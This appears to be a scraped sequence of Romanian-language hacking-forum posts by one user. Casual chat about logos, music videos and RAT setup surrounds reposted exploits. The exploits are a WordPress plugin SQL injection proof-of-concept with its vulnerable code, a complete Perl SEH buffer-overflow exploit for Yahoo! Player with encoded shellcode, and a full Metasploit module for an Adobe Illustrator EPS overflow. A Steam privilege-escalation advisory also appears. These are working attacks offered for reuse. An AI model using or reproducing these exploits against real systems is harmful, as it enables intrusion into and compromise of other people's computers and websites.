Gabriel87

Astea mai mult is bannere web nu logo-uri cum a zis si Gecko se face vectoriale.. si fara imagini sau resurse de pe Net ala atunci il poti numi Logo @kozy , se poate face si in PS si in AI

# Exploit Title: WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability # Date: 2011-08-28 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/fbpromotions.1.3.3.zip # Version: 1.3.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/fbpromotions/fbActivate.php?action=activate&name=test&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- Vulnerable code --------------- if($_REQUEST['action']=="activate"){ $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']); ... $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'"; Sursa : WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability

#!/usr/bin/perl # Exploit Title: yahoo! player 1.5 (.m3u) Universal Buffer Overflow (SEH) # Date: 27/08/2011 # Author: D3r K0n!G # Software Link: http://www.clubic.com/lancer-le-telechargement-8059-0-yahoo-player.html # Version: 1.5.01.409 # Tested on: Windows XP SP3 # CVE : N/A # Greets to: All my frends (DZ) & all members of www.se4ever.com & www.h4kz.net my $file = "yahoo.m3u"; my $junk = "\x41" x 2049; my $nexseh = "\xeb\x10\x90\x90"; # Short jump my $seh = pack ('V',0x300117f7); # POP POP RET => DUNZIP32.dll my $junk2 = "\x90" x 12; #windows/exec EXITFUNC=seh CMD=calc.exe R | msfencode -e x86/alpha_upper -t c $shellcode = "\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43". "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34". "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41". "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30". "\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52". "\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b". "\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50". "\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c". "\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54". "\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b". "\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c". "\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31". "\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47". "\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54". "\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e". "\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30". "\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51". "\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51". "\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45". "\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50". "\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56". "\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a". "\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c". "\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38". "\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b". "\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d". "\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d". "\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53". "\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43". "\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35". "\x45\x50\x41\x41"; open($File, ">$file"); print $File $junk.$nexseh.$seh.$junk2.$shellcode; close($FILE); Sursa : yahoo! player 1.5 (.m3u) Universal Buffer Overflow (SEH)

Inainte sa postezi ai citit regulile forumului ? dar se pare ca nu http://rstcenter.com/forum/8703-lista-cu-cele-mai-frecvente-intrebari-raspunsurile-la-ele.rst 4. Ma puteti ajuta sa fur sau sa sparg un id/site Raspuns: Cu siguranta aceste cereri vor insemna ban permanent pe forum. NU PERMITEM ca aceste cereri sa fie postate pe partea publica a forumului si nici sa fie facute prin mesaje private catre ceilalti useri.

@DEFENDOR De aia am dat Edit la post pentru ca nu stiu cum se numea primu remix de la Dj Bl3nd da ascult si eu Dj Bl3nd

Timati feat Snoop Dogg - Groove on ( Official Music Video ) New 2009 HQ - YouTube

## # $Id: adobe_illustrator_v14_eps.rb 10477 2010-09-25 11:59:02Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Illustrator CS4 v14.0.0', 'Description' => %q{ Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) overlong DSC Comment Buffer Overflow Exploit }, 'License' => MSF_LICENSE, 'Author' => [ 'Nine:Situations:Group::pyrokinesis', 'dookie' ], 'Version' => '$Revision: 10477 $', 'References' => [ [ 'CVE', '2009-4195' ], [ 'BID', '37192' ], [ 'OSVDB', '60632' ], [ 'URL', 'http://retrogod.altervista.org/9sg_adobe_illuso.html' ], [ 'URL', 'http://www.exploit-db.com/exploits/10281' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00\x0D\x0C\x0A", 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', { 'Ret' => 0x4B4B5173 } ], # CALL ESI in icudt36.dll ], 'Privileged' => false, 'DisclosureDate' => 'Dec 03 2009', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.eps']), ], self.class) end def exploit header = "\xc5\xd0\xd3\xc6\x20\x00\x00\x00\x05\xc8\x04\x00\x00\x00" header << "\x00\x00\x00\x00\x00\x00%\xc8\x04\x00\xb5I\x01\x00\xff" header << "\xff\x00\x00" header << "%!PS-Adobe-3.1\x20EPSF-3.0\r\n" header << "%ADO_DSC_Encoding:\x20Windows\x20Roman\r\n" header << "%" sploit = rand_text_alpha(41699) sploit << [target.ret].pack('V') sploit << rand_text_alpha(2291) sploit << "%Title:\x20Untitled-1.eps\r\n" sploit << "%AAAAAAAA" sploit << payload.encoded trailer = ": A\r\n" trailer << "%%For:\x20alias\r\n" trailer << "%%CreationDate:\x2011/27/2009\r\n" trailer += "%%BoundingBox:\x200\x200\x20227\x20171\r\n" trailer += "%%HiResBoundingBox:\x200\x200\x20226.5044\x20170.3165\r\n" trailer += "%%CropBox:\x200\x200\x20226.5044\x20170.3165\r\n" trailer += "%%LanguageLevel:\x202\r\n" trailer += "%%DocumentData:\x20Clean7Bit\r\n" trailer += "%ADOBeginClientInjection:\x20DocumentHeader\x20\"AI11EPS\"\r\n" trailer += "%%AI8_CreatorVersion:\x2014.0.0\r" trailer += "%AI9_PrintingDataBegin\r" trailer += "%ADO_BuildNumber:\x20Adobe\x20Illustrator(R)\x2014.0.0\x20x367\x20R\x20agm\x204.4890\x20ct\x205.1541\r" trailer += "%ADO_ContainsXMP:\x20MainFirst\r" trailer += "%AI7_Thumbnail:\x20128\x2096\x208\r" trailer += "%%BeginData:\x204096\x20Hex\x20Bytes\r" trailer += "%0000330000660000990000CC0033000033330033660033990033CC0033FF\r\n" eps = header + sploit + trailer print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(eps) end end

Valve Steam Client Application v1559/1559 Local Privilege Escalation Vendor: Valve Corporation Product web page: http://www.steampowered.com Affected version: Built: Jun 1, 2011 at 15:31:24 Steam API: v010 Steam package versions 1559 / 1559 File version: 1.0.968.628 Summary: Steam is a digital distribution, digital rights management, multiplayer and communications platform developed by Valve Corporation. It is used to distribute games and related media online, from small independent developers to larger software houses. Steam also has community features, automated game updates, and in-game voice and chat functionality. Desc: Steam is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the "F" flag (Full Control) for the "Users" group, for the binary file Steam.exe, GameOverlayUI.exe and steamerrorreporter.exe. The binary (Steam.exe) is set by default to Startup with "-silent" parameter. Tested on: Microsoft Windows XP Professional SP3 (EN) Vendor status: 24.06.2011 - Vulnerability discovered. 25.06.2011 - Initial contact with the vendor. 25.06.2011 - Auto-reply from the vendor stating that the message is received. 28.06.2011 - No reply from the vendor. 29.06.2011 - Public security advisory released. Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Advisory ID: ZSL-2011-5022 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5022.php 24.06.2011 ------------------------------------------------------------ C:\Program Files\Steam>cacls Steam.exe C:\Program Files\Steam\Steam.exe BUILTIN\Users:F <--- NT AUTHORITY\SYSTEM:F BUILTIN\Power Users:C BUILTIN\Administrators:F LABPC\User101:F

Na si care e treaba voastra poate l-a facut acuma privat ce va roade pe voi ca scrie " Working on.. " si numai e public sau numai merge invata-ti programare si fa faceti voi singuri un tools numai stati sa va dea cineva pe tava tot PS : Nu o luati in nume de rau nu am nimic cu voi

Aia inseamna ca lucreaza la el

Cumicu - Mii de ganduri. - YouTube

Vin si eu maine cu o versiune acuma nu sunt acasa

@Gecko , ar fi bine sa facem si noi un grup pe Gmail sa vorbim despre proiecte sau pe mess o conferinta Edit : Gecko , ai PM

Nu cred , poate are si fani si eu numa acuma am auzit de el cu stirea asta Hacker-ul Micul Fum a fost prins Pentru cei curiosi cum arata " Micul Fum "

@25aug , daca nici un rat nu sti seta ce mai vrei atunci rat? vezi ca sunt la Dark Comet la alte versiuni tutorial cum sa il setezi si te iei dupa ala @XgaMeR , Pai salveaza tot ce ai setat in Rat si dupaia numai iti dispare setarile la el

Nu am stiut ca a intrat si Gecko da facem tot felul daca doreste cineva Edit : Surge , atunci e foarte bine facem o treaba minunata impreuna mai ales ca Gecko stie sa si codeze html + css

Thanks , ai prins ceva cu el ? ce IP trebuie pus ? Edit : Ms

@Surge , stai linistita de aia suntem 3 in grup cu tine cu tot fac eu cu robert.... nu asta e problema dar sa facem ceva pentru RST sa nu stam deageaba

Da normal ca ajutam dar semnaturi nu are rost poate niste " No avatar " Edit : Sau pentru tine Wav3 cand mai faci programe in VB merg ceva imagini si pentru alti

Bravo !!

Specii - Farmacia de la colt - YouTube

Poti uploada pe alt host " The file you are trying to access is temporarily unavailable. Please try again later. "

Nu te ajuta cu nimic Malwarebytes daca e cryptat serveru 100% mai bine formeaza windows-ul si dupaia bagi Malwarebytes si Avira pe PC